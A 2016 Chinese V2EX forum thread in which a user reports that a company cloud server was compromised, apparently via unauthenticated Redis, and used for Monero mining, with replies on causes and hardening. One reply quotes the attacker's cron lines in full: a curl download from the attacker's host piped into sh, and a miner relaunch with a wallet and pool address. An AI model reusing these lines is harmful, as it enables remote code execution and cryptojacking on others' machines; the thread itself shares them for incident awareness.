V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Recommended Services
Amazon Web Services
LeanCloud
New Relic
ClearDB
wraith4
V2EX  ›  云计算

今天发现公司的阿里云服务被黑了,被安装了 yam 来挖矿

  •  1
     
  •   wraith4 · 2016-06-20 11:41:19 +08:00 · 17039 次点击
    这是一个创建于 3086 天前的主题,其中的信息可能已经有所发展或是发生改变。
    应该是利用 redis 漏洞入侵,加了定时任务,每 2 分钟请求 https://r.chanstring.com/api/report?pm=1 这个地址,脚本写的不错。执行挖矿程序后导致 cpu 和带宽 100%, kill 进程会自动重启。
    解决方案: http://www.cnblogs.com/red-code/p/5599393.html
    和这个有些差异,最后要修补redis漏洞。
    28 条回复    2016-07-01 11:55:02 +08:00
    stanjia
        1
    stanjia  
       2016-06-20 11:49:49 +08:00
    脚本写的不错! 发来看看 怎么写的
    wraith4
        2
    wraith4  
    OP
       2016-06-20 11:51:58 +08:00
    @stanjia 直接访问那个地址啊
    stanjia
        3
    stanjia  
       2016-06-20 11:54:10 +08:00
    @wraith4 哈哈哈哈哈
    aprikyblue
        4
    aprikyblue  
       2016-06-20 12:52:31 +08:00 via Android
    502 Bad Gateway
    tomczhen
        5
    tomczhen  
       2016-06-20 12:58:22 +08:00 via iPhone
    所以说你们公司的 redis 可以公网访问?
    realpg
        6
    realpg  
       2016-06-20 13:08:06 +08:00
    这个服务器是不是跑 jboss 的……笑……
    fy
        7
    fy  
       2016-06-20 13:11:06 +08:00
    所以脚本是怎么写的。。
    iyangyuan
        8
    iyangyuan  
       2016-06-20 13:11:14 +08:00
    redis 一般是放在内网的
    coolloves
        9
    coolloves  
       2016-06-20 13:15:48 +08:00
    放出来参考下吧
    eoo
        10
    eoo  
       2016-06-20 14:01:07 +08:00 via Android
    shell
    Jaylee
        11
    Jaylee  
       2016-06-20 14:19:18 +08:00
    redis 未授权访问的漏洞都这么长时间了还不修复。。。活该被黑啊
    fcicq
        12
    fcicq  
       2016-06-20 15:25:17 +08:00
    没勒索数据的就是良心黑客了, 赶紧偷笑去吧.
    hard2reg
        13
    hard2reg  
       2016-06-20 16:19:39 +08:00   ❤️ 1
    我只是想偷偷挖个矿。。。
    Gua
        14
    Gua  
       2016-06-20 16:21:26 +08:00 via iPhone
    @hard2reg 还被发现了…
    j4fun
        15
    j4fun  
       2016-06-20 17:05:48 +08:00
    没有觉得写的多好啊、、、
    vus520
        16
    vus520  
       2016-06-20 17:13:37 +08:00
    公司内网的测试机也这样被爆过,重要文件被打包加密然后删除了目录。
    要勒索 N 个比特币,我 TM 有这么多比特币还在这陪你玩?最后重装服务器搞定 。
    ipconfiger
        17
    ipconfiger  
       2016-06-20 17:13:47 +08:00   ❤️ 1
    1, 到手注入公钥后立马关掉密码登录
    2, 除了 http 外的所有服务都不要开公网访问
    能做到着两点的话, 基本安全无虞
    notgod
        18
    notgod  
       2016-06-20 17:26:32 +08:00
    2 天前中招, r.chanstring.com 解析在 DO 的 IP
    在 digitalocean 投诉过 说处理 都 2 天了 这机器竟然还他妈在线
    https://i.niupic.com/images/2016/06/20/OBjiiQ.jpg

    会加 2 条定时任务

    */2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh
    */2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]-pool.fr:6666/xmr &


    官方回
    Hey there,

    Thank you for your response.

    Thank you for submitting your abuse complaint. One of our support engineers has picked it up and assigned it to the customer in question and it will be resolved as soon as possible.

    Looking forward to hearing from you if you have any other questions or require any further assistance.

    Thank you!
    Jeff Elliott
    Trust & Safety Specialist
    DigitalOcean Support

    然后就没下文了
    notgod
        19
    notgod  
       2016-06-20 17:28:27 +08:00
    这个国人干的事
    登录 IP 是阿里云的
    glogo
        20
    glogo  
       2016-06-20 17:31:32 +08:00
    redis 居然可以公网访问....
    jugelizi
        21
    jugelizi  
       2016-06-20 17:56:38 +08:00
    开源软件默认不加口令害死人啊
    即便开放在内网也不安全的
    wraith4
        22
    wraith4  
    OP
       2016-06-20 21:17:18 +08:00
    这是公司的外网测试环境,小公司,没有专业运维人员。
    Flygoat
        23
    Flygoat  
       2016-06-20 22:39:01 +08:00 via Android
    唉我前段时间被搞的那只 Server 给人装了 BOINC,这是不是业界良心啊。
    incompatible
        24
    incompatible  
       2016-06-20 23:23:10 +08:00
    redis 漏洞本身不致命,用 root 账户登录服务器并启动程序才是致命的。
    strahe
        25
    strahe  
       2016-06-20 23:27:48 +08:00
    几层楼以上的,怎么还怪起开源软件的默认配置了,实际上都应该自己好好配置下的,只是大部分人都忽略了.
    hanxiV2EX
        26
    hanxiV2EX  
       2016-06-20 23:32:53 +08:00 via iPhone
    竟然用 root 账户启动 redis
    franklinyu
        27
    franklinyu  
       2016-06-22 13:13:48 +08:00
    總之是自己作死,不怪人家 Redis
    michael2016
        28
    michael2016  
       2016-07-01 11:55:02 +08:00
    插播广告:专业接安全运维的活儿,有兴趣的私聊哈!
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   6125 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 29ms · UTC 02:17 · PVG 10:17 · LAX 18:17 · JFK 21:17
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.